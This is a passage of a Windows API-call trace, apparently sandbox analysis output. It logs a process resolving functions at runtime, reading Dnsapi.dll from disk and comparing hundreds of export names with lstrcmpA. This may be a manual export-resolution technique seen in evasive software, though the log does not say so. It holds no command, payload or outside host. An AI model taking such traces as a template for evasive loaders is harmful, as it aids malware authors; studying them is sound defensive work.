(lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0146.928] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0146.938] GetProcessHeap () returned 0x470000 [0146.939] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4150040 | out: hHeap=0x470000) returned 1 [0146.946] GetProcessHeap () returned 0x470000 [0146.946] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489ab0 [0146.947] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0147.107] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0147.107] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0147.107] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0147.107] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0147.107] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0147.108] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0147.108] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0147.108] GetProcessHeap () returned 0x470000 [0147.108] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa7b88) returned 0x3acd010 [0147.109] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0147.109] ReadFile (in: hFile=0x17c, lpBuffer=0x3acd010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3acd010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0147.122] CloseHandle (hObject=0x17c) returned 1 [0147.122] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0147.122] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.122] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0147.122] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.122] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.122] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0147.122] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.122] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.122] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0147.122] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0147.123] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.123] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.123] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0147.123] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0147.123] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0147.123] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.123] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.123] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0147.123] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0147.123] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.123] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0147.123] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.123] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.123] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0147.123] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0147.123] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.123] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0147.123] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0147.123] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.123] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.123] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0147.123] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0147.123] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.123] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0147.123] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0147.124] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0147.124] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0147.124] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.124] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.124] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0147.124] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0147.124] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.124] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0147.125] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0147.125] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0147.125] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0147.125] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0147.125] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0147.125] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0147.125] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0147.125] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0147.125] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0147.126] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0147.126] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0147.127] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0147.127] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.127] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.127] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0147.127] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0147.288] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.288] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0147.288] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0147.288] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0147.288] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0147.288] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0147.288] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0147.288] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0147.288] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0147.289] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0147.290] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0147.290] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0147.290] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0147.290] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0147.290] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0147.290] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0147.290] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0147.290] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0147.290] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0147.290] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0147.290] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0147.290] 